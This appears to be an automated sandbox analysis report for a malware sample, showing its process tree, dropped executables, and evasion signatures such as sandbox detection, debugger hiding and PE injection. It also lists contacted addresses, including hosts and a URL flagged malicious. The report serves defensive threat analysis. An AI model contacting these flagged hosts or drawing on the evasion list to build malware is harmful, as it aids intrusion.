behaviorgraph top1 signatures2 2 Behavior Graph ID: 1521602 Sample: file.exe Startdate: 29/09/2024 Architecture: WINDOWS Score: 100 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Antivirus detection for dropped file 2->81 83 10 other signatures 2->83 8 skotes.exe 2 24 2->8         started        13 file.exe 5 2->13         started        15 skotes.exe 2->15         started        17 5 other processes 2->17 process3 dnsIp4 61 185.215.113.43, 49709, 49711, 49713 WHOLESALECONNECTIONSNL Portugal 8->61 63 185.215.113.103, 49712, 49714, 49717 WHOLESALECONNECTIONSNL Portugal 8->63 49 C:\Users\user\AppData\...\8a145ab7b3.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\...\random[1].exe, PE32 8->51 dropped 53 C:\Users\user\1000026002\cee706a53f.exe, PE32 8->53 dropped 105 Creates multiple autostart registry keys 8->105 107 Hides threads from debuggers 8->107 109 Injects a PE file into a foreign processes 8->109 19 cee706a53f.exe 13 8->19         started        22 8a145ab7b3.exe 13 8->22         started        25 skotes.exe 8->25         started        29 2 other processes 8->29 55 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->55 dropped 57 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->57 dropped 111 Detected unpacking (changes PE section rights) 13->111 113 Tries to evade debugger and weak emulator (self modifying code) 13->113 115 Tries to detect virtualization through RDTSC time measurements 13->115 117 Potentially malicious time measurement code found 13->117 27 skotes.exe 13->27         started        119 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->119 121 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->121 65 127.0.0.1 unknown unknown 17->65 file5 signatures6 process7 dnsIp8 85 Tries to detect sandboxes and other dynamic analysis tools (window names) 19->85 87 Machine Learning detection for dropped file 19->87 89 Tries to evade debugger and weak emulator (self modifying code) 19->89 59 185.215.113.37, 49715, 49718, 49732 WHOLESALECONNECTIONSNL Portugal 22->59 91 Hides threads from debuggers 22->91 93 Tries to detect sandboxes / dynamic malware analysis system (registry check) 22->93 95 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 22->95 97 Antivirus detection for dropped file 27->97 99 Multi AV Scanner detection for dropped file 27->99 101 Detected unpacking (changes PE section rights) 27->101 103 2 other signatures 27->103 31 chrome.exe 6 29->31         started        34 chrome.exe 29->34         started        36 conhost.exe 29->36         started        38 conhost.exe 29->38         started        signatures9 process10 dnsIp11 73 192.168.2.8, 137, 138, 443 unknown unknown 31->73 75 239.255.255.250 unknown Reserved 31->75 40 chrome.exe 31->40         started        43 chrome.exe 31->43         started        45 chrome.exe 31->45         started        47 chrome.exe 34->47         started        process12 dnsIp13 67 googlehosted.l.googleusercontent.com 142.250.185.129, 443, 49731, 49799 GOOGLEUS United States 40->67 69 play.google.com 142.250.185.174, 443, 49775, 49776 GOOGLEUS United States 40->69 71 10 other IPs or domains 40->71
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.186.46
 youtube.com United States
15169 GOOGLEUS false
142.250.186.78
 www3.l.google.com United States
15169 GOOGLEUS false
142.250.185.129
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.16.206
 unknown United States
15169 GOOGLEUS false
172.217.18.14
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
216.58.206.68
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.185.174
 play.google.com United States
15169 GOOGLEUS false
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Private

IP
192.168.2.8
127.0.0.1

Contacted Domains

Name IP Active
youtube-ui.l.google.com 172.217.18.14 true
google.com 142.250.185.206 true
www3.l.google.com 142.250.186.78 true
play.google.com 142.250.185.174 true
www.google.com 216.58.206.68 true
googlehosted.l.googleusercontent.com 142.250.185.129 true
youtube.com 142.250.186.46 true
clients2.googleusercontent.com unknown unknown
accounts.youtube.com unknown unknown
chrome.google.com unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://clients2.googleusercontent.com/crx/blobs/AY4GWKCjSWa8TD5HR0ssoNSHmv1DlGbxavvv4f4_vreCQV6o4JdgbhTns13WqVLfraA3idGD1YqVFdL1d29hUkKmBRQxeBB8OW5ZEZvDIDLLC0_H7OAK-03clOTMdE15SKgAxlKa5Za-otUDEb42n7phqLA20ygc_Y63/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_9_1_1.crx false
    		unknown
    https://www.google.com/favicon.ico false
      		unknown
      https://clients2.googleusercontent.com/crx/blobs/AY4GWKDHKllS27BO_e8bCnbax_jg8ytdTG4Uzua5Kte91Msonmjt9Ssh1u4j53F3UYy-997sHknkzKEy9994XId3zBBDiju_YSunzv5QYwyL8XEx9VuF26n3JIgkmCYaLzIAxlKa5UdUDZoPCHdwU63c7rFT0JUxfsWG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_82_1_0.crx false
        		unknown
        http://185.215.113.37/ true
          		unknown